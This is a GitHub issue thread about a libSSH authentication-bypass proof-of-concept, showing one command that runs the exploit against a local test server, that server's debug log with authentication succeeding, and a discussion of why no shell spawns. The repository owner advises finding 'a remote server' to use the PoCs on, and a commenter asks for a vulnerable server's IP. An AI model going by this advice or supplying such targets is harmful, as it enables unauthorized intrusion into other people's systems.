Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Questions about libSSH-Authentication-Bypass #7

Closed
thinkycx opened this issue Oct 18, 2018 · 4 comments

Comments

@thinkycx
Copy link

commented Oct 18, 2018

Client side:

$ python libsshauthbypass.py  --host 172.17.0.4 -p22
/usr/local/lib/python2.7/dist-packages/paramiko/rsakey.py:130: CryptographyDeprecationWarning: signer and verifier have been deprecated. Please use sign and verify instead.
  algorithm=hashes.SHA1(),

Server Side:

$ ./samplesshd-cb --dsakey /root/.ssh/id_dsa --rsakey /root/.ssh/id_rsa 0.0.0.0 -p 22 -v
[2018/10/18 07:34:58.992643, 3] ssh_socket_pollcallback:  Received POLLOUT in connecting state
[2018/10/18 07:34:58.992749, 3] ssh_socket_unbuffered_write:  Enabling POLLOUT for socket
[2018/10/18 07:34:58.992958, 3] callback_receive_banner:  Received banner: SSH-2.0-paramiko_2.0.8
[2018/10/18 07:34:58.992987, 1] ssh_server_connection_callback:  SSH client banner: SSH-2.0-paramiko_2.0.8
[2018/10/18 07:34:58.993000, 1] ssh_analyze_banner:  Analyzing banner: SSH-2.0-paramiko_2.0.8
[2018/10/18 07:34:58.993060, 3] ssh_socket_unbuffered_write:  Enabling POLLOUT for socket
[2018/10/18 07:34:58.993074, 3] packet_send2:  packet: wrote [len=516,padding=10,comp=505,payload=505]
[2018/10/18 07:34:58.993779, 3] ssh_packet_socket_callback:  packet: read type 20 [len=596,padding=8,comp=587,payload=587]
[2018/10/18 07:34:58.993814, 3] ssh_packet_process:  Dispatching handler for packet type 20
[2018/10/18 07:34:58.993844, 3] crypt_set_algorithms_server:  Set output algorithm aes128-ctr
[2018/10/18 07:34:58.993853, 3] crypt_set_algorithms_server:  Set input algorithm aes128-ctr
[2018/10/18 07:34:58.993860, 3] crypt_set_algorithms_server:  Set HMAC output algorithm to hmac-sha2-256
[2018/10/18 07:34:58.993869, 3] crypt_set_algorithms_server:  Set HMAC input algorithm to hmac-sha2-256
[2018/10/18 07:34:59.045960, 3] ssh_packet_socket_callback:  packet: read type 30 [len=140,padding=5,comp=134,payload=134]
[2018/10/18 07:34:59.046017, 3] ssh_packet_process:  Dispatching handler for packet type 30
[2018/10/18 07:34:59.046029, 3] ssh_packet_kexdh_init:  Received SSH_MSG_KEXDH_INIT
[2018/10/18 07:34:59.048511, 3] ssh_socket_unbuffered_write:  Enabling POLLOUT for socket
[2018/10/18 07:34:59.048553, 3] packet_send2:  packet: wrote [len=700,padding=8,comp=691,payload=691]
[2018/10/18 07:34:59.048597, 3] packet_send2:  packet: wrote [len=12,padding=10,comp=1,payload=1]
[2018/10/18 07:34:59.048605, 3] dh_handshake_server:  SSH_MSG_NEWKEYS sent
[2018/10/18 07:34:59.048664, 3] ssh_socket_unbuffered_write:  Enabling POLLOUT for socket
[2018/10/18 07:34:59.089804, 3] ssh_packet_socket_callback:  packet: read type 21 [len=12,padding=10,comp=1,payload=1]
[2018/10/18 07:34:59.089866, 3] ssh_packet_process:  Dispatching handler for packet type 21
[2018/10/18 07:34:59.089880, 2] ssh_packet_newkeys:  Received SSH_MSG_NEWKEYS
[2018/10/18 07:34:59.089920, 3] ssh_handle_key_exchange:  ssh_handle_key_exchange: current state : 7
[2018/10/18 07:34:59.093583, 3] ssh_packet_socket_callback:  packet: read type 52 [len=12,padding=10,comp=1,payload=1]
[2018/10/18 07:34:59.093626, 3] ssh_packet_process:  Dispatching handler for packet type 52
[2018/10/18 07:34:59.093693, 3] ssh_packet_userauth_success:  Authentication successful
[2018/10/18 07:34:59.145509, 3] ssh_packet_socket_callback:  packet: read type 90 [len=44,padding=19,comp=24,payload=24]
[2018/10/18 07:34:59.145565, 3] ssh_packet_process:  Dispatching handler for packet type 90
[2018/10/18 07:34:59.145579, 3] ssh_packet_channel_open:  Clients wants to open a session channel
Allocated session channel
[2018/10/18 07:34:59.145602, 3] ssh_message_channel_request_open_reply_accept_channel:  Accepting a channel request_open for chan 0
[2018/10/18 07:34:59.145681, 3] ssh_socket_unbuffered_write:  Enabling POLLOUT for socket
[2018/10/18 07:34:59.145709, 3] packet_send2:  packet: wrote [len=28,padding=10,comp=17,payload=17]
[2018/10/18 07:34:59.160915, 3] ssh_packet_socket_callback:  packet: read type 98 [len=28,padding=12,comp=15,payload=15]
[2018/10/18 07:34:59.160974, 3] ssh_packet_process:  Dispatching handler for packet type 98
[2018/10/18 07:34:59.160990, 3] ssh_message_handle_channel_request:  Received a shell channel_request for channel (43:0) (want_reply=1)
Allocated shell
[2018/10/18 07:34:59.161004, 3] ssh_message_channel_request_reply_success:  Sending a channel_request success to channel 0
[2018/10/18 07:34:59.161073, 3] ssh_socket_unbuffered_write:  Enabling POLLOUT for socket
[2018/10/18 07:34:59.161101, 3] packet_send2:  packet: wrote [len=12,padding=6,comp=5,payload=5]
[2018/10/18 07:34:59.262384, 1] ssh_socket_exception_callback:  Socket exception callback: 1 (0)
[2018/10/18 07:34:59.262443, 1] ssh_socket_exception_callback:  Socket error: disconnected
Error : Socket error: disconnected

Do you know why it doesn't spawn a shell? Thank you.

@blacknbunny

This comment has been minimized.

Copy link
Owner

commented Oct 18, 2018

Important : "People trying to reproduce libssh bug: the sample code (samplesshd-cb) is not vuln because it has explicit auth handlers. You can open a channel but nothing will happen."

As we can see this section just for opening channel but you can not spawn to a shell in server that started by "samplesshd-cb"

It's just for opening channel. PoCs that i wrote is just for remote hosts.


Like i wrote at README.MD. You can't use these PoCs on local server. Find a remote server and then use it.

@thinkycx

This comment has been minimized.

Copy link
Author

commented Oct 18, 2018

Important : "People trying to reproduce libssh bug: the sample code (samplesshd-cb) is not vuln because it has explicit auth handlers. You can open a channel but nothing will happen."

As we can see this section just for opening channel but you can not spawn to a shell in server that started by "samplesshd-cb"

It's just for opening channel. PoCs that i wrote is just for remote hosts.

Like i wrote at README.MD. You can't use these PoCs on local server. Find a remote server and then use it.

Thank you.

@blacknbunny

This comment has been minimized.

Copy link
Owner

commented Oct 18, 2018

Thank you for reporting this issue.

@nx4dm1n

This comment has been minimized.

Copy link

commented Oct 19, 2018

Important : "People trying to reproduce libssh bug: the sample code (samplesshd-cb) is not vuln because it has explicit auth handlers. You can open a channel but nothing will happen."
As we can see this section just for opening channel but you can not spawn to a shell in server that started by "samplesshd-cb"
It's just for opening channel. PoCs that i wrote is just for remote hosts.
Like i wrote at README.MD. You can't use these PoCs on local server. Find a remote server and then use it.

Thank you.

hi,i use these PoCs on remote server,but it doesn't spawn a shell too , can u give me a remote server ip which can spawn a shell,thanks。

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Projects
None yet
3 participants
You can’t perform that action at this time.